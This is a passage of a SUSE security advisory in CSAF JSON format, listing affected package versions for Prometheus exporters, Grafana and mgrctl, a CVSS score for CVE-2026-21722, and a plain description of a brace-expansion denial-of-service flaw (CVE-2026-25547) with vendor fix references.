"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-25T10:11:52Z",
"details": "moderate"
}
],
"title": "CVE-2026-21722"
},
{
"cve": "CVE-2026-25547",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-25547"
}
],
"notes": [
{
"category": "general",
"text": "@isaacs/brace-expansion is a hybrid CJS/ESM TypeScript fork of brace-expansion. Prior to version 5.0.1, @isaacs/brace-expansion is vulnerable to a denial of service (DoS) issue caused by unbounded brace range expansion. When an attacker provides a pattern containing repeated numeric brace ranges, the library attempts to eagerly generate every possible combination synchronously. Because the expansion grows exponentially, even a small input can consume excessive CPU and memory and may crash the Node.js process. This issue has been patched in version 5.0.1.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"openSUSE Leap 15.6:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"openSUSE Leap 15.6:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:spacecmd-5.0.15-150000.3.142.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-25547",
"url": "https://www.suse.com/security/cve/CVE-2026-25547"
},
{
"category": "external",
"summary": "SUSE Bug 1257834 for CVE-2026-25547",
"url": "https://bugzilla.suse.com/1257834"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.aarch64",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.ppc64le",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.s390x",
"SUSE Linux Enterprise Module for Package Hub 15 SP7:golang-github-prometheus-promu-0.17.0-150000.3.30.1.x86_64",
"SUSE Manager Client Tools 15:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:firewalld-prometheus-config-0.1-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools 15:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"SUSE Manager Client Tools 15:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.s390x",
"SUSE Manager Client Tools 15:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.x86_64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.aarch64",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.ppc64le",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.s390x",
"SUSE Manager Client Tools 15:golang-github-prometheus-prometheus-3.5.0-150000.3.67.1.x86_64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.aarch64",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.ppc64le",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.s390x",
"SUSE Manager Client Tools 15:grafana-11.6.11-150000.1.90.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.ppc64le",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools 15:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools 15:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.ppc64le",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools 15:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"SUSE Manager Client Tools 15:spacecmd-5.0.15-150000.3.142.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.s390x",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-0.1.38-150000.1.30.1.x86_64",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-bash-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-lang-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:mgrctl-zsh-completion-0.1.38-150000.1.30.1.noarch",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.aarch64",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.s390x",
"SUSE Manager Client Tools for SLE Micro 5:prometheus-blackbox_exporter-0.26.0-150000.1.30.2.x86_64",
"openSUSE Leap 15.6:dracut-saltboot-1.1.0-150000.1.65.1.noarch",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.aarch64",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.ppc64le",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.s390x",
"openSUSE Leap 15.6:golang-github-QubitProducts-exporter_exporter-0.4.0-150000.1.21.1.x86_64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.aarch64",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.ppc64le",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.s390x",
"openSUSE Leap 15.6:golang-github-boynux-squid_exporter-1.13.0-150000.1.12.1.x86_64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.aarch64",
"openSUSE Leap 15.6:golang-github-lusitaniae-apache_exporter-1.0.10-150000.1.26.1.ppc64le",
